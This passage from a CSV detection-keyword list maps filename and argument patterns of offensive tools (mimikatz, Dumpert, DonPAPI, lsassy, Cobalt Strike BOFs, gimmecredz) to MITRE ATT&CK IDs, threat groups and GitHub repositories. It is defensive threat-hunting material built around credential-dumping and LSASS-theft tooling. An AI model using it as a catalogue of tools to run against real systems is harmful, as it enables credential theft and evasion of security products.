T1218.011,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/mandiant/DueDLLigence,1,1,N/A,10,5,441,90,2023-06-02T14:24:43Z,2019-10-04T18:34:27Z -*dump_chrome_user*,offensive_tool_keyword,gimmecredz,This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on,T1003 - T1081 - T1552,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/0xmitsurugi/gimmecredz,1,1,N/A,N/A,2,166,25,2020-01-25T21:56:20Z,2018-09-25T15:46:50Z -*dump_CREDENTIAL_MSOFFICE*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,0,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*dump_CREDENTIAL_TASKSCHEDULER*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,0,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*dump_CREDENTIAL_TSE*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,0,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*dump_domain*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,1,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*dump_firefox_user*,offensive_tool_keyword,gimmecredz,This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on,T1003 - T1081 - T1552,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/0xmitsurugi/gimmecredz,1,1,N/A,N/A,2,166,25,2020-01-25T21:56:20Z,2018-09-25T15:46:50Z -*dump_jenkins*,offensive_tool_keyword,gimmecredz,This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on,T1003 - T1081 - T1552,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/0xmitsurugi/gimmecredz,1,1,N/A,N/A,2,166,25,2020-01-25T21:56:20Z,2018-09-25T15:46:50Z -*dump_keepassx*,offensive_tool_keyword,gimmecredz,This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on,T1003 - T1081 - T1552,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/0xmitsurugi/gimmecredz,1,1,N/A,N/A,2,166,25,2020-01-25T21:56:20Z,2018-09-25T15:46:50Z -*dump_lsass*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*dump_lsass.js*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*dump_process(*lsass.exe*)*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*dump_sam(*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*dump_secrets.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*dump_ssh_keys*,offensive_tool_keyword,gimmecredz,This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on,T1003 - T1081 - T1552,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/0xmitsurugi/gimmecredz,1,1,N/A,N/A,2,166,25,2020-01-25T21:56:20Z,2018-09-25T15:46:50Z -*dump_tomcat*,offensive_tool_keyword,gimmecredz,This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on,T1003 - T1081 - T1552,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/0xmitsurugi/gimmecredz,1,1,N/A,N/A,2,166,25,2020-01-25T21:56:20Z,2018-09-25T15:46:50Z -*dump_VAULT_INTERNET_EXPLORER*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,0,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*dump_VAULT_NGC_LOCAL_ACCOOUNT*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,0,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*dump_VAULT_WIN_BIO_KEY*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,0,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*dump_webconf*,offensive_tool_keyword,gimmecredz,This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on,T1003 - T1081 - T1552,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/0xmitsurugi/gimmecredz,1,1,N/A,N/A,2,166,25,2020-01-25T21:56:20Z,2018-09-25T15:46:50Z -*dump_webpass*,offensive_tool_keyword,gimmecredz,This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on,T1003 - T1081 - T1552,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/0xmitsurugi/gimmecredz,1,1,N/A,N/A,2,166,25,2020-01-25T21:56:20Z,2018-09-25T15:46:50Z -*dump_wifi_wpa_*,offensive_tool_keyword,gimmecredz,This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on,T1003 - T1081 - T1552,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/0xmitsurugi/gimmecredz,1,1,N/A,N/A,2,166,25,2020-01-25T21:56:20Z,2018-09-25T15:46:50Z -*dump_WPA-PBKDF2-PMKID_EAPOL.hashcat*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*dump_WPA-PMKID-PBKDF2.hashcat*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*DumpBrowserHistory*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*dumpcap -*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*DumpCreds*,offensive_tool_keyword,DumpCreds,Dumpcreds is a tool that may be used to extract various credentials from running processes. I just take a look at mimipenguin(https://github.com/huntergregal/mimipenguin) and tried to improve it a bit,T1055 - T1003 - T1216 - T1002 - T1552,TA0002 - TA0003 - TA0008 - TA0006,N/A,N/A,Credential Access,https://github.com/ponypot/dumpcreds,1,1,N/A,N/A,1,4,1,2019-10-08T07:26:31Z,2017-10-10T12:57:42Z -*-DumpCreds*,offensive_tool_keyword,mimikatz,Invoke-Mimikatz.ps1 script argument,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*dumpCredStore.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1060,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Dumpert*,offensive_tool_keyword,Dumpert,Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.,T1003 - T1055 - T1083 - T1059 - T1204,TA0003 - TA0005 - TA0002,N/A,N/A,Credential Access,https://github.com/outflanknl/Dumpert,1,0,N/A,N/A,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*Dumpert.bin*,offensive_tool_keyword,cobaltstrike,LSASS memory dumper using direct system calls and API unhooking.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor,1,1,N/A,10,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*dumpert.dmp*,offensive_tool_keyword,Dumpert,Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.,T1003 - T1055 - T1083 - T1059 - T1204,TA0003 - TA0005 - TA0002,N/A,N/A,Credential Access,https://github.com/outflanknl/Dumpert,1,1,N/A,N/A,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*Dumpert.exe*,offensive_tool_keyword,cobaltstrike,LSASS memory dumper using direct system calls and API unhooking.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor,1,1,N/A,10,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*Dumpert.exe*,offensive_tool_keyword,Dumpert,Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.,T1003 - T1055 - T1083 - T1059 - T1204,TA0003 - TA0005 - TA0002,N/A,N/A,Credential Access,https://github.com/outflanknl/Dumpert,1,1,N/A,N/A,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*Dumpert.git*,offensive_tool_keyword,Dumpert,Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.,T1003 - T1055 - T1083 - T1059 - T1204,TA0003 - TA0005 - TA0002,N/A,N/A,Credential Access,https://github.com/outflanknl/Dumpert,1,1,N/A,N/A,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*dumpert.py*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*dumpert_path=*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*Dumpert-Aggressor*,offensive_tool_keyword,cobaltstrike,LSASS memory dumper using direct system calls and API unhooking.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor,1,1,N/A,10,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*Dumpert-Aggressor*,offensive_tool_keyword,Dumpert,Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.,T1003 - T1055 - T1083 - T1059 - T1204,TA0003 - TA0005 - TA0002,N/A,N/A,Credential Access,https://github.com/outflanknl/Dumpert,1,1,N/A,N/A,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*dumpertdll*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*Dumpert-DLL*,offensive_tool_keyword,Dumpert,Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.,T1003 - T1055 - T1083 - T1059 - T1204,TA0003 - TA0005 - TA0002,N/A,N/A,Credential Access,https://github.com/outflanknl/Dumpert,1,1,N/A,N/A,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*-DumpForest *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*dumplsass*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*dumpntlm.py*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,1,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*DumpNTLMInfo.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*DumpProcessByName*,offensive_tool_keyword,cobaltstrike,A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/PPLDump_BOF,1,1,N/A,10,10,131,24,2021-09-24T07:10:04Z,2021-09-24T07:05:59Z -*DumpShellcode.*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*DumpShellcode.exe*,offensive_tool_keyword,cobaltstrike,Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.,T1055 - T1078.003,TA0002 - TA0006,N/A,N/A,Credential Access,https://github.com/trustedsec/PPLFaultDumpBOF,1,1,N/A,N/A,2,115,11,2023-05-17T12:57:20Z,2023-05-16T13:02:22Z -*DumpShellcode\*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,0,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*DumpSMSAPassword*,offensive_tool_keyword,BloodHound,an adversary with local admin access to an AD-joined computer can dump the cleartext password from LSA secrets of any sMSAs installed on this computer,T1003.001 - T1078 - T1558.002,TA0006 - TA0004 - TA0003,N/A,N/A,AD Enumeration,https://github.com/BloodHoundAD/BloodHound,1,1,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -*dumpVaultCredentials.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*dumpXor.exe *,offensive_tool_keyword,cobaltstrike,dump lsass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/seventeenman/CallBackDump,1,0,N/A,10,10,510,74,2023-07-20T09:03:33Z,2022-09-25T08:29:14Z -*-e --enumerate google*github*k8s --github-only-org --k8s-get-secret-values --gcp-get-secret-values*,offensive_tool_keyword,PurplePanda,This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.,T1595 - T1078 - T1583 - T1087 - T1526,TA0003 - TA0004 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/carlospolop/PurplePanda,1,0,N/A,N/A,6,569,80,2023-08-07T04:13:59Z,2022-01-01T12:10:40Z -*-e 